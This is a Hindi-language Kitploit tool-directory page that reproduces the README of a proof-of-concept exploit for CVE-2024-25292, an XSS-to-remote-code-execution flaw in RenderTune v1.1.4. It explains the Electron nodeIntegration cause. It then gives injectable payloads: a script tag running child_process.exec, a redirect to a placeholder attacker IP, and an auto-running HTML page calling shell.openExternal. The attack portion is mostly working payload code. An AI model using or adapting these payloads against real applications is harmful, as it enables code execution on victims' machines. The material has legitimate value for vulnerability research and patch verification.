Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25292 — RenderTune v1.1.4 में XSS से RCE एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2024-25292
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubeqstlab/cve-2024-25292

CVE-2024-25292

RenderTune v1.1.4 में XSS से RCE एक्सप्लॉइट

रिपॉजिटरी देखें
2111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RenderTune RCE

CVE-2024-25292 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

RenderTune v1.1.4 में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता हमलावरों को Upload Title पैरामीटर में इंजेक्ट किए गए विशेष रूप से तैयार किए गए पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है। इस रिपॉजिटरी में एक उदाहरण भेद्य अनुप्रयोग और इसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण मौजूद है।

PoC के रूप में एक पायथन फ़ाइल है जो प्रक्रिया को स्वचालित करती है।

1.भेद्यता अवलोकन:

यह एक भेद्यता है जो XSS के माध्यम से RCE को सक्षम बनाती है। शीर्षक में XSS-सक्षम भाग होता है, इसलिए यह एक भेद्यता है जो XSS के सिंटैक्स के माध्यम से NodeJS के सिंटैक्स द्वारा RCE को सक्षम बनाती है।


2. भेद्यता का कारण:

  • nteract 0.28.0 Markdown लिंक के माध्यम से Electron वेबव्यू की अनुमति देता है, जिसके परिणामस्वरूप दूरस्थ कोड निष्पादन संभव होता है (क्योंकि webPreferences में nodeIntegration true है)।
  • शोषण स्पष्टीकरण
    • जब एप्लिकेशन के भीतर MarkDown के माध्यम से लिंक उत्पन्न किए जाते हैं, तो यह Electron के माध्यम से एक WebView बनाता है, जिससे लिंक तक बाहरी पहुंच संभव होती है। परिणामस्वरूप, एक हमलावर हमलावर के सर्वर की ओर जाने वाले लिंक से जुड़कर दूरस्थ कोड निष्पादन (RCE) प्राप्त कर सकता है।

प्रूफ-ऑफ-कॉन्सेप्ट (POC)

केस 1) XSS से RCE।

चरण 1) पुष्टि करें कि शीर्षक भाग में XSS होता है ※ इस समय, जब तक छवि संलग्न नहीं की जाती, Upload आइटम पंजीकृत नहीं होगा

root@kitploit:~
<b>jruru</b>

1

चरण 2) इसलिए, इसे NodeJS सिस्टम कमांड निष्पादित करने के लिए XSS का उपयोग करने के लिए कॉन्फ़िगर किया गया है।

root@kitploit:~
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

2

केस 2) हमलावर सर्वर के माध्यम से हमले

※ जब आप window.location का उपयोग करके हमले का प्रयास करते हैं, तो ऐप चलाने पर आप हर बार स्वचालित रूप से उस पेज पर पहुंच जाते हैं जिसे आपने सेट किया है।

root@kitploit:~
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>

नोट: ※ यदि आप इसे शीघ्रता से परीक्षण करना चाहते हैं, तो निम्नलिखित कोड के साथ हमलावर के पीसी पर एक सर्वर बनाएं।

root@kitploit:~
$ python -m http.server 80
  • PoC कोड
root@kitploit:~
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

renderTune3


टूल डाउनलोड करें